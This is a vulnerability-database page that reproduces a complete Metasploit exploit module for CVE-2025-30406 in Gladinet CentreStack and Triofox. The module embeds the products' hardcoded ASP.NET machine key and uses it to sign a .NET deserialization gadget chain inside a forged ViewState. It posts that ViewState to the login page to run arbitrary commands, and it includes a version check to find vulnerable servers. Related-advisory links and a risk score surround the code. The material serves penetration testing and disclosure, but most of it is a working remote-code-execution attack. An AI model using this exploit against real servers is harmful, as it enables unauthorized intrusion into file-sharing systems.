Vulners
Lucene search
📄 Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
🗓️ 28 May 2025 00:00:00Reported by h00die-gr3y, Huntress TeamType 
packetstorm🔗 packetstorm.news👁 207 Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Exploit for Use of Hard-coded Credentials in Gladinet Centrestack | 29 Dec 202511:21 | – | githubexploit |
| Exploit for CVE-2025-11371 | 15 Oct 202514:10 | – | githubexploit |
| Exploit for Use of Hard-coded Cryptographic Key in Gladinet Centrestack | 31 Jul 202519:14 | – | githubexploit |
 | CVE-2025-30406 | 3 Apr 202500:00 | – | attackerkb |
 | The vulnerability of the Gladinet CentreStack software platform for secure file sharing lies in the use of strictly encrypted user credentials, allowing a hacker to execute arbitrary code. | 28 Apr 202500:00 | – | bdu_fstec |
 | CVE-2025-30406 | 3 Apr 202519:35 | – | circl |
 | Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability | 8 Apr 202500:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 8 Apr 202512:00 | – | cisa |
 | Gladinet CentreStack 安全漏洞 | 3 Apr 202500:00 | – | cnnvd |
 | CVE-2025-30406 | 3 Apr 202500:00 | – | cve |
10
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
require 'rex/exploit/view_state'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
# base64 encoded machine key
MACHINE_KEY = 'NTQ5NjgzMjI0MkNDMzIyOEUyOTJFRUZGQ0RBMDg5MTQ5RDc4OUUwQzREN0MxQTVEMDJCQzU0MkY3QzYyNzlCRTlERDc3MEM5RURENUQ2N0M2NkI3RTYyMTQxMUQzRTU3RUExODFCQkY4OUZEMjE5NTdEQ0RERkFDRkQ5MjZFMTY='.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization',
'Description' => %q{
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded
cryptographic keys for ViewState could allow an attacker to forge ViewState data.
This can lead to unauthorized actions such as remote code execution.
Both applications make use of a hardcoded machineKey in the IIS web.config file,
which is responsible for securing ASP.NET ViewState data. If an attacker obtains
the machineKey, they can forge ViewState payloads that pass integrity checks.
This can result in ViewState deserialization attacks, potentially leading to
remote code execution (RCE) on the web server.
Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).
Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).
NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.
},
'Author' => [
'Huntress Team', # discovery and detailed vulnerability write up
'H00die Gr3y' # this metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-30406'],
['URL', 'https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild'],
['URL', 'https://attackerkb.com/topics/7ebXn71J6O/cve-2025-30406']
],
'Platform' => 'win',
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :windows_command
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-04-03',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
},
'Privileged' => false
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The base path to the Gladinet CentreStack or Triofox application', '/' ])
])
end
def execute_command(cmd, _opts = {})
# get the __VIEWSTATEGENERATOR value from the vulnerable page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
})
unless res&.code == 200
fail_with(Failure::UnexpectedReply, 'Non-200 HTTP response received while trying to get the __VIEWSTATEGENERATOR value.')
end
html = res.get_html_document
if html
# html identifier for the __VIEWSTATEGENERATOR: <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="3FE2630A" />
generator = html.css('input#__VIEWSTATEGENERATOR')[0]['value']
viewstate_generator = [generator.to_i(16)].pack('V') unless generator.nil?
else
viewstate_generator = ['3FE2630A'.to_i(16)].pack('V')
end
output_format = 'raw'
viewstate_validation_algorithm = 'SHA256'
viewstate_validation_key = [Base64.strict_decode64(MACHINE_KEY)].pack('H*')
serialized = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TextFormattingRunProperties,
formatter: :LosFormatter
)
serialized = Rex::Exploit::ViewState.generate_viewstate(
serialized,
extra: viewstate_generator,
algo: viewstate_validation_algorithm,
key: viewstate_validation_key
)
transformed = ::Msf::Simple::Buffer.transform(serialized, output_format)
vprint_status(transformed.to_s)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx'),
'vars_post' => {
'__LASTFOCUS' => '',
'__VIEWSTATE' => transformed.to_s
}
})
unless res&.code == 302
fail_with(Failure::UnexpectedReply, 'Non-302 HTTP response received while trying to execute the payload.')
end
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'portal', 'loginpage.aspx')
})
return CheckCode::Safe('Failed to identify that Gladinet CentreStack/Triofox or similar service is running.') unless res&.code == 200 && res.body.include?('id="__VIEWSTATEGENERATOR" value="3FE2630A"')
if res.body.include?('CentreStack')
check_app = 'CentreStack'
elsif res.body.include?('Triofox')
check_app = 'Triofox'
else
check_app = 'Unknown'
end
build = res.body.match(/\(Build\s*.*\)/)
unless build.nil?
version = build[0].gsub(/[[:space:]]/, '').split('Build')[1].chomp(')')
rex_version = Rex::Version.new(version)
if check_app == 'CentreStack'
return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10315.56368')
elsif check_app == 'Triofox'
return CheckCode::Appears("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
elsif check_app == 'Unknown'
return CheckCode::Detected("Service #{check_app} (Build #{version})") if rex_version < Rex::Version.new('16.4.10317.56372')
end
return CheckCode::Safe("Service #{check_app} (Build #{version})")
end
CheckCode::Detected("Service #{check_app} (Build not detected)")
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
execute_command(payload.encoded)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2025 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 3.19 - 9.8
EPSS0.92727